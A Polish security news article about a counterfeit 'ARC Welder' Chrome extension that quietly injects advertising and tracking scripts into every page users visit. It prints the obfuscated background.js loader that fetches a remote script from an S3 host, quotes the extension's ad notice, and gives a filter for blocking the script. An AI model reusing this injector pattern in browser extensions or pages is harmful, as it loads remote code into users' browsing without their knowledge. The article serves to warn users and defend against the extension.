Tysiące programistów dało się nabrać na złośliwe narzędzie deweloperskie ARC Welder

ARC Welder to plugin do przeglądarki Google Chrome, które po zainstalowaniu daje możliwość uruchomienia dowolnej aplikacji z pliku APK. To prawdziwe rozszerzenie „ARC Welder” znajduje się pod tym linkiem i ma prawie milion pobrań. Najciekawsze jest to, że nie jest ono dostępne w wyszukiwarce Google. Wartość meta-tagu <content="noindex"> powoduje, że słowa kluczowe nie są indeksowane. Natomiast indeksowane jest za to wątpliwej jakości i pobrane ponad 30 tysięcy razy rozszerzenie ARC-Welder.com, które zawiera wbudowany złośliwy kod.

ARC Welder prawdziwe i fałszywe

Na Reddicie zauważono, że ARC-Welder.com wstrzykuje do każdej odwiedzanej strony internetowej zobfuskowanym w pliku background.js kod JavaScript, który jest pobierany z serwerów Amazona:

(function(){var script=document.createElement("script");script.src="///s3.amazonaws.com/js-cache/1bbe2f4535e7dfb295.js";document.head.appendChild(script);document.head.removeChild(script)})();

Użytkownik, który zainstalował to rozszerzenie może się spodziewać dziesiątek lub setek odwołań do dziwnych domen wyświetlających reklamy i zawierających kod śledzenia. Pełny odszyfrowany kod pliku background.js jest dostępny tutaj. Na samym końcu tego pliku widzimy dodatkowo taką informację:

(…) development is supported by <b>optional</b> advertisements that are added to some of the websites you visit. During the development of this extension, I\'ve put in thousands of hours adding features, fixing bugs and making things betternot mentioning the support of all the users who ask for help.<br><br>Ads support most of the internet we all use and love; without them, the internet we have today would simply not exist. Similarly, without revenue, this extension (and the upcoming new ones) would not be possible.<br><br><b>You can disable these ads now or later in the settings page. You can also minimize the ads appearance by clicking on partial support button. Both of these options are available by clicking \'x\' button in the corner of each ad.</b> In both cases,your choice will remain in effect unless you reinstall or reset the extension (…)

Identyczną wiadomość wykorzystano 2 lata temu w podobnej kampanii wyświetlającej reklamy w innym rozszerzeniu i nie jest wykluczone, że za oba dodatki do przeglądarek odpowiada ten sam autor.

Walka z reklamami nie jest trudna. Wszystkie topowe przeglądarki wspierają genialne rozszerzenie uBlock Origin, które rekomendujemy do instalacji użytkownikom niezależnie od wykonywanej na komputerze pracy. Jeśli jesteś deweloperem i korzystasz z ARC Welder, powinieneś dodać do blokowanych filtrów ten skrypt: s3.amazonaws.com/js-cache/1bbe2f4535e7dfb295.js



Dodaj komentarz

Treść tego pola jest prywatna i nie będzie udostępniana publicznie.

Zapoznaj się z naszą ofertą

Jeśli zajmujesz się sprzedażą rozwiązań zabezpieczających, jesteś dystrybutorem, autoryzowanym partnerem lub producentem i chciałbyś na portalu AVLab zaprezentować swoje portfolio gronu potencjalnych odbiorców, zareklamować wydarzenie, oprogramowanie, sprzęt lub inne usługi — po prostu napisz do nas. A może mialeś/aś do czynienia z ransomware? Pomagamy też w odszyfrowaniu plików.
Czytaj więcej